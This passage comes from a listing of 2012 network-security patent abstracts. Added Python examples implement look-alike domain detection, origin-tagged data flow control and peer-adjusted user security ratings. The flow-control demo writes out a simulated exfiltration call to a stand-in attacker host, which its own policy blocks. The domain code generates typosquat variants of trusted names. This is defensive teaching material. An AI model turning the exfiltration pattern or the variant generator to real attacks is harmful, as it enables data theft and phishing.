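The point of the construction is the last function in each pair: the component that receives the SYN-ACK recomputes the cookie from what it sees on the wire and needs nothing from the component that sent the SYN except the key, which is the embodiment in which sender and receiver are different components. A 24-bit MAC is short by cryptographic standards; it is a rate-limiting defence against blind SYN-ACK injection, not a substitute for TLS.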
  • Patent number: 8201259
    Abstract: The invention relates to a method for evaluating or accessing a network address, comprising the steps of: receiving a network address (50); generating derivatives (60) of the received network address (50); assigning a trust level to the generated derivatives (60) and the received network address (50); comparing the trust levels of the derivatives (60) with the trust level of the received network address (50); and issuing a response based on the comparison.
    Type: Grant
    Filed: December 13, 2006
    Date of Patent: June 12, 2012
    Assignee: International Business Machines Corporation
    Inventors: Tadeusz Pietraszek, Chris Vanden Berghe
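One way to carry out the steps in the abstract above (receive an address, generate derivatives, assign trust levels, compare, respond), as an added Python example that is not code from the patent or from IBM. The derivative rules (character deletion, adjacent transposition, confusable substitution, TLD swap), the trust table and the sample addresses are constructed for this illustration; a deployment would draw trust levels from a reputation service or the user's own history.

```python
"""Network-address derivative evaluation, modelled on the abstract of US 8201259 (IBM).

Added example only; not code from the patent or from IBM. The derivative rules,
the trust table and the sample addresses are constructed for this illustration.
"""
from __future__ import annotations

from urllib.parse import urlparse

# Constructed trust table: hostname -> trust level (higher is more trusted).
TRUST_TABLE = {"paypal.com": 3, "www.paypal.com": 3, "example.org": 2}
UNKNOWN_TRUST = 0

# Visually confusable replacements commonly seen in look-alike domains.
CONFUSABLES = {"1": "l", "l": "1", "0": "o", "o": "0", "rn": "m", "m": "rn", "vv": "w", "w": "vv"}
TLDS = ("com", "net", "org")


def host_of(address: str) -> str:
    """Lower-cased hostname of a URL or bare host (no public-suffix handling: assumption)."""
    parsed = urlparse(address if "://" in address else "//" + address)
    return (parsed.hostname or "").lower()


def derivatives(host: str) -> set[str]:
    """Single-edit variants of a hostname: what the user may have meant, or
    what an attacker may have registered next to a trusted name."""
    labels = host.split(".")
    if len(labels) < 2:
        return set()
    name, tld = ".".join(labels[:-1]), labels[-1]
    out: set[str] = set()
    if len(name) > 1:
        for i in range(len(name)):                      # one character dropped
            out.add(name[:i] + name[i + 1:] + "." + tld)
    for i in range(len(name) - 1):                      # adjacent characters swapped
        out.add(name[:i] + name[i + 1] + name[i] + name[i + 2:] + "." + tld)
    for frm, to in CONFUSABLES.items():                 # confusable substitution
        idx = name.find(frm)
        while idx != -1:
            out.add(name[:idx] + to + name[idx + len(frm):] + "." + tld)
            idx = name.find(frm, idx + 1)
    for alt in TLDS:                                    # top-level domain swapped
        if alt != tld:
            out.add(name + "." + alt)
    out.discard(host)
    return out


def trust_level(host: str) -> int:
    return TRUST_TABLE.get(host, UNKNOWN_TRUST)


def evaluate(address: str) -> dict:
    """Assign trust to the address and to each derivative, compare, and respond.
    A derivative trusted more than the address itself means the address sits
    one edit away from something the user trusts: the look-alike case."""
    host = host_of(address)
    own = trust_level(host)
    better = {d: trust_level(d) for d in derivatives(host) if trust_level(d) > own}
    if better:
        verdict = "warn"
    elif own > UNKNOWN_TRUST:
        verdict = "allow"
    else:
        verdict = "unknown"
    return {
        "host": host,
        "trust": own,
        "verdict": verdict,
        "lookalike_of": max(better, key=better.get) if better else None,
    }
```

`evaluate("https://paypa1.com/login")` returns a warning naming `paypal.com`, because the digit-for-letter derivative is trusted while the address itself is not; `evaluate("https://www.paypal.com/")` is allowed, since none of its derivatives outranks it; an address with no trusted neighbours comes back as unknown rather than as a warning, which keeps the check from flagging every unfamiliar site.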
  • Patent number: 8201234
    Abstract: Computer-readable medium having a data structure stored thereon for defining a schema for expressing a network security policy. The data structure includes a first data field including data defining a parameter to be applied based on the network security policy. The network security policy defines at least one of the following: a firewall rule and a connection security rule. The data structure also includes a second data field having data specifying restrictions of the parameter included in the first data field. The parameter in the first data field and the restrictions in the second data field form the schema for expressing the network security policy to be processed. The network security policy manages communications between a computing device and at least one other computing device.
    Type: Grant
    Filed: May 9, 2007
    Date of Patent: June 12, 2012
    Assignee: Microsoft Corporation
    Inventors: Gerardo Diaz-Cuellar, David Abzarian, Lokesh Srinivas Koppolu, Eran Yariv
  • Publication number: 20120144187
    Abstract: Embodiments provide an application layer security proxy that protects substation automation systems. The application layer security proxy inspects a received, inbound data packet at the application layer, and either drops the data packet, forwards the data packet, or processes the data packet rather than dropping it in order to maintain the communications network connection, the latter two according to a predefined role-based access control policy. The application layer security proxy calculates a round trip time for each reply to a received, inbound data packet and observes the bandwidth usage from the amount of bytes transmitted. Round trip time and bandwidth usage are used to detect abnormal communication traffic.
    Type: Application
    Filed: December 5, 2011
    Publication date: June 7, 2012
    Applicant: Siemens Corporation
    Inventors: Dong Wei, Livio Dalloro, Yan Lu
  • Patent number: 8196183
    Abstract: A server interacts with a sender to form a package which can include one or more attached data files to be sent to one or more recipients, and the server applies a policy established by a policy authority of the sender to the package. Since the server both forms the package through interaction with the sender and applies the policy, any violations of the policy by the package can be brought to the sender's attention during an interactive session with the sender and before encryption of all or part of the package. As a result, the sender is educated regarding the policy of the sender's policy authority, and the sender can modify the package immediately to comport with the policy. The server delivers the package to the one or more intended recipients by sending notification to each recipient and including in such notification package identification data, e.g., a URL by which the package can be retrieved.
    Type: Grant
    Filed: March 1, 2004
    Date of Patent: June 5, 2012
    Assignee: Axway Inc.
    Inventors: Jeffrey C. Smith, Jean-Christophe Bandini
  • Patent number: 8191105
    Abstract: A system and method for handling secure-format messages includes a message server that receives secure-format messages from senders and operates in conjunction with a secure message handler to detect and prevent the delivery of invalid secure-format messages. When a secure-format message is determined to be invalid, the secure message handler may take one or more of the following actions: replace the body of the invalid message with a template message, send a message to the sender of the invalid message indicating the message was rejected, delete the invalid message from the recipient's mailbox, or log the message on the message server and mark it for review. Additionally, the handling of invalid messages is configurable. In particular, the actions to take and the conditions under which those actions are to be taken may be specified by an administrator.
    Type: Grant
    Filed: November 18, 2005
    Date of Patent: May 29, 2012
    Assignee: Research In Motion Limited
    Inventors: Neil P. Adams, David V. MacFarlane, Ian Robertson
  • Patent number: 8190876
    Abstract: A method and apparatus for securing a connection with a Secure Sockets Layer/Transport Layer Security (SSL/TLS)-enabled server. In one embodiment, a web client establishes a new connection by initiating a communication with the SSL/TLS-enabled server. The communication includes a non-POST request. After the client negotiates the secured connection with the server in response to the non-POST request, the client submits a POST request to the SSL/TLS-enabled server via the secured connection.
    Type: Grant
    Filed: November 19, 2007
    Date of Patent: May 29, 2012
    Assignee: Red Hat, Inc.
    Inventor: James Paul Schneider
  • Patent number: 8181260
    Abstract: Provided are methods, apparatus and computer programs for tracking the origins of data and controlling transmission of the data. In one embodiment, transmission of sensitive data by script operations is limited, to prevent transmission to any network location other than to the source of that sensitive data, by a new function within a scripting engine of an HTTP client that is responsive to origin tags placed within the data. Origin tags that are associated with data inputs are propagated to any output data items, so that transmission of derived information can also be controlled.
    Type: Grant
    Filed: July 15, 2008
    Date of Patent: May 15, 2012
    Assignee: International Business Machines Corporation
    Inventors: Julian L. Friedman, Peter Verdon
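The tag-propagation and transmission-control behaviour the abstract describes, as an added Python example that is not code from the patent or from IBM. The `TaggedStr` type, the `transmit()` gate, the origin strings and the sample response body are constructed for this illustration. The patent places the equivalent logic inside the HTTP client's scripting engine, where every string operation is covered; a library type like the one below only covers the operations it overrides.

```python
"""Origin tags propagated through script string operations, modelled on the
abstract of US 8181260 (IBM).

Added example only; not code from the patent or from IBM. TaggedStr, the
transmit() gate and all origins/data here are constructed for illustration.
"""
from __future__ import annotations

from urllib.parse import urlparse


def _origins_of(value) -> frozenset:
    return value.origins if isinstance(value, TaggedStr) else frozenset()


class TaggedStr(str):
    """A string carrying the set of network origins its content derives from.
    Operations that produce output from tagged input return a TaggedStr with
    the union of the inputs' tags, so derived values remain controlled."""

    def __new__(cls, value, origins=()):
        obj = super().__new__(cls, value)
        obj.origins = frozenset(origins)
        return obj

    def __add__(self, other):
        return TaggedStr(str.__add__(self, other), self.origins | _origins_of(other))

    def __radd__(self, other):          # "literal" + tagged -> tagged
        return TaggedStr(str.__add__(other, self), _origins_of(other) | self.origins)

    def __getitem__(self, key):         # indexing and slicing keep the tags
        return TaggedStr(str.__getitem__(self, key), self.origins)

    def upper(self):
        return TaggedStr(str.upper(self), self.origins)

    def lower(self):
        return TaggedStr(str.lower(self), self.origins)

    def replace(self, old, new, count=-1):
        return TaggedStr(str.replace(self, old, new, count), self.origins | _origins_of(new))


class PolicyViolation(Exception):
    pass


def origin_of(url: str) -> str:
    p = urlparse(url)
    return f"{p.scheme}://{p.hostname}".lower()


def receive(url: str, body: str) -> TaggedStr:
    """Stand-in for the HTTP client's response path: data is tagged with the
    origin it was fetched from. `body` is constructed sample data."""
    return TaggedStr(body, {origin_of(url)})


def transmit(url: str, data) -> bool:
    """Scripting-engine gate on outbound requests: tagged data may only go back
    to its own origin. Data that mixes two origins may go to neither, since
    either destination would learn the other's data. Untagged literals are free."""
    dest = origin_of(url)
    foreign = _origins_of(data) - {dest}
    if foreign:
        raise PolicyViolation(f"data derived from {sorted(foreign)} may not be sent to {dest}")
    return True


def demo() -> dict:
    balance = receive("https://bank.example/account", "balance=1234.56")
    # A script derives a new value: slice, case change, concatenation with literals.
    derived = "acct:" + balance[8:].upper() + "&ref=x"
    out = {"tags": sorted(derived.origins)}
    out["back_to_source"] = transmit("https://bank.example/log", derived)
    try:
        transmit("https://evil.example/collect", derived)
        out["exfil"] = "allowed"
    except PolicyViolation:
        out["exfil"] = "blocked"
    out["literal_ok"] = transmit("https://evil.example/ping", "hello")
    return out
```

`demo()` shows the derived value still carrying the bank's origin after slicing, upper-casing and concatenation with literals, so it may be posted back to the bank but not to a third-party host. The caveat to keep in mind with a library type: `str.join`, `str.format` and f-strings return plain `str` and would silently drop the tags, which is why the abstract puts the mechanism in the scripting engine itself.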
  • Patent number: 8181253
    Abstract: Disclosed are systems, methods and computer program products for reducing security risk in a computer network. The system includes an administration server that collects system usage, user profile and security incidents information from a plurality of computers in the network. The server determines values of one or more risk factors for each computer using the collected information. The server then calculates a security rating of each computer user as a function of the risk factors and adjusts the calculated security rating of a given computer user based on the security ratings of other computer users with whom the given computer user communicates. The server then selects, based on the adjusted security rating, security settings for the computer of the given user in order to reduce the user's security risk to the computer network and applies the selected security settings to the computer of the given user.
    Type: Grant
    Filed: June 30, 2011
    Date of Patent: May 15, 2012
    Assignee: Kaspersky Lab ZAO
    Inventors: Oleg V. Zaitsev, Valery A. Boronin
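The rating pipeline in the abstract above (risk factors from collected information, a per-user rating, adjustment by the ratings of the user's contacts, then settings selection), as an added Python example that is not code from the patent or from Kaspersky Lab. The telemetry fields, weights, the contact graph, the 30% peer blend and the settings thresholds are all constructed for this illustration.

```python
"""Security rating with peer adjustment, modelled on the abstract of
US 8181253 (Kaspersky Lab). Added example; risk factors, weights, thresholds
and sample telemetry are constructed here, not taken from the patent."""
from __future__ import annotations

# Constructed telemetry as collected by the administration server, per user.
TELEMETRY = {
    "alice": {"incidents_90d": 0, "unpatched_apps": 1, "admin_rights": False, "removable_media_uses": 2},
    "bob":   {"incidents_90d": 3, "unpatched_apps": 6, "admin_rights": True,  "removable_media_uses": 15},
    "carol": {"incidents_90d": 0, "unpatched_apps": 0, "admin_rights": False, "removable_media_uses": 0},
}
# Constructed communication graph (mail/IM contacts observed by the server).
CONTACTS = {"alice": ["bob"], "bob": ["alice", "carol"], "carol": ["bob"]}

# Relative importance of each risk factor (assumption).
WEIGHTS = {"incidents": 0.4, "patching": 0.3, "privilege": 0.2, "media": 0.1}


def risk_factors(t: dict) -> dict[str, float]:
    """Map raw telemetry to risk factors normalised into [0, 1]."""
    return {
        "incidents": min(t["incidents_90d"] / 3, 1.0),
        "patching": min(t["unpatched_apps"] / 5, 1.0),
        "privilege": 1.0 if t["admin_rights"] else 0.0,
        "media": min(t["removable_media_uses"] / 10, 1.0),
    }


def base_rating(t: dict) -> float:
    """Security rating on a 0..100 scale, 100 being safest."""
    f = risk_factors(t)
    risk = sum(WEIGHTS[k] * f[k] for k in WEIGHTS)
    return round(100 * (1 - risk), 1)


def adjusted_ratings(telemetry: dict, contacts: dict, peer_weight: float = 0.3) -> dict[str, float]:
    """Blend each user's own rating with the mean rating of the users they
    communicate with: a careful user who exchanges mail with risky ones is
    exposed to whatever they forward."""
    base = {u: base_rating(t) for u, t in telemetry.items()}
    out: dict[str, float] = {}
    for user, own in base.items():
        peers = [base[p] for p in contacts.get(user, []) if p in base]
        if peers:
            out[user] = round((1 - peer_weight) * own + peer_weight * sum(peers) / len(peers), 1)
        else:
            out[user] = own
    return out


def select_settings(rating: float) -> str:
    """Pick a settings profile; lower rating, stricter profile (thresholds assumed)."""
    if rating >= 80:
        return "standard"
    if rating >= 60:
        return "hardened"       # e.g. heuristic scanning on, removable media read-only
    return "locked-down"        # e.g. application allow-listing, web filtering


def plan(telemetry: dict = TELEMETRY, contacts: dict = CONTACTS) -> dict[str, str]:
    """Settings profile to apply to each user's computer."""
    return {u: select_settings(r) for u, r in adjusted_ratings(telemetry, contacts).items()}
```

With the constructed data alice rates 92.0 on her own telemetry but 64.4 after adjustment, because her only contact is bob at 0.0; carol, who has a perfect own rating, lands at 70.0 for the same reason. Both therefore receive the hardened profile even though neither has done anything risky, which is exactly the effect the adjustment step is meant to have: the user who is most likely to receive bob's infected attachments is protected before the incident, not after.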
  • Patent number: 8181010
    Abstract: A system for authenticating a request to access a protected network resource behind two security layers is disclosed. The system includes a client which contains a web browser, a first server tier, and a second server tier. The first server tier is protected behind a first security layer and hosts a first software object and second software object. The first server tier is operatively coupled to the client system via a first connection wherein the first software object and second software object are configured to be in communications with the web browser. The second server tier is protected behind the first security layer and second security layer and hosts an authentication service. The second server tier is operatively coupled to the first server tier via a second connection wherein the authentication service is configured to be in communications with the second software object.
    Type: Grant
    Filed: April 17, 2006
    Date of Patent: May 15, 2012
    Assignee: Oracle America, Inc.
    Inventors: Mrudul P. Uchil, Aravindan Ranganathan
  • Patent number: RE43500
    Abstract: In a computer system, a first electronic data processor is communicatively coupled to a first memory space and a second memory space. A second electronic data processor is communicatively coupled to the second memory space and to a network interface device. The second electronic data processor is capable of exchanging data across a network of one or more computers via the network interface device. A video processor is adapted to combine video data from the first and second electronic data processors and transmit the combined video data to a display terminal for displaying the combined video data in a windowed format. The computer system is configured such that a malware program downloaded from the network and executing on the second electronic data processor is incapable of initiating access to the first memory space.
    Type: Grant
    Filed: March 9, 2010
    Date of Patent: July 3, 2012
    Inventors: Allen F. Rozman, Alfonso J. Cioffi
  • Patent number: RE43528
    Abstract: In a computer system, a first electronic data processor is communicatively coupled to a first memory space and a second memory space. A second electronic data processor is communicatively coupled to the second memory space and to a network interface device. The second electronic data processor is capable of exchanging data across a network of one or more computers via the network interface device. A video processor is adapted to combine video data from the first and second electronic data processors and transmit the combined video data to a display terminal for displaying the combined video data in a windowed format. The computer system is configured such that a malware program downloaded from the network and executing on the second electronic data processor is incapable of initiating access to the first memory space.
    Type: Grant
    Filed: March 9, 2010
    Date of Patent: July 17, 2012
    Inventors: Allen F. Rozman, Alfonso J. Cioffi
  • Patent number: RE43529
    Abstract: In a computer system, a first electronic data processor is communicatively coupled to a first memory space and a second memory space. A second electronic data processor is communicatively coupled to the second memory space and to a network interface device. The second electronic data processor is capable of exchanging data across a network of one or more computers via the network interface device. A video processor is adapted to combine video data from the first and second electronic data processors and transmit the combined video data to a display terminal for displaying the combined video data in a windowed format. The computer system is configured such that a malware program downloaded from the network and executing on the second electronic data processor is incapable of initiating access to the first memory space.
    Type: Grant
    Filed: November 7, 2010
    Date of Patent: July 17, 2012
    Inventors: Allen F. Rozman, Alfonso J. Cioffi